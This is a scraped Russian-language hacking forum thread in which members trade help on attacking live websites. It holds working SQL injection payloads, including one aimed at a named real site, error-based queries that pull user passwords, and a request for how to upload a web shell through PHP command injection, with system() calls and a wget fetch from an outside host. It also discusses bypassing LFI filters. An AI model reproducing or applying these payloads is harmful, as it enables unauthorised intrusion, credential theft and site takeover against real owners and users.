news.php?id=0 union select 1,2,3,4,5,6,7,8,group_concat(%74able_name) from information_schema.tables Так попробуй,а лучше выложи ссыль.
Извините плз, возможно ли реализовать эту инъекцию через wappex? Если да, то объясните в 2х словах или подробно если не сложно. Ещё раз извиняюсь за назойливость.
http://www.artsnspirits.com/quick-signup.php?eventid=0%20union%20select%201,2,3,4,5,6,7,8,9 принтабльный парметр - 6
http://www.artsnspirits.com/quick-signup.php?eventid=0+union+select+1,2,3,4,5,hex(table_name),7,8,9+from+information_schema.tables+limit+16,1--+ Дальше сам.
id=(1)and(select 1 from(select count(*),concat((SELECT user_password from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- Subquery returns more than 1 row В чем трабл? имена колонок и таблиц таким способом узнал, а данные не извлекаются
PHP: id=(1)and(select 1 from(select count(*),concat((SELECT substr(user_password,1,99) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--
Можно отредактировать шаблон Можно в папке wp-includes полазить и посмотреть какие из них инклудятся на главную страницу, и отредактировать его
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт? такие команды выполняються system('ls -la'); system('rmdir hack'); system('mkdir hack'); system('id'); а вот system('wget http://goomihas.narod.ru/testing.php')
1) Проверяет наличие инъекции, т.к. and 1 = 1 возвращает истину, а and 1 > 1 - ложь, отсюда меняется размер или содержание страницы и т.о. проверяется наличие инъекции. 2) Комментарии /*!int */ в котором, всё заключенное в данный комментарий будет интерпретироваться как SQL запрос если номер данной версии MySQL равен указанному числу int после восклицательного знака или больше. Code: SELECT pass/*!32302 ,login*/FROM users Выведет столбец login если версия MySQL равна либо выше 3.23.02
Prosta4ok , для того что-бы видеть ошибку. Проблема ни в том что уязвимости нет, проблема в фильтрации переменных. не фильтрует ":!@" и еще пару символов. поэтому не получается подняться на каталоги выше. Вопрос кто работал с протоколом "data:" Есть возможность использовать его при LFI? Какие еще варианты обхода фильтрации при локальном инклуде?
Ну в mysql если параметр число, то тип числовой,если строка то строковой, как правило. Логично же?) В факе от Dr. Zero(на рдоте) всё описано и разжёвано, как определять sqli и прочие. Если числовой тип, то делай ?id=5-1, если есть инъекция, и не фильтруется минус, то выведется 4-ая новость или т.п. Алгоритм выведешь на основе своей практики. Читайте больше, всё разжёвано. Чтобы использовать wrappers, нужно чтобы до переменной в функции ничего небыло(пути). Типо include ($_GET['p'].'.php'); В твоём случае не получится.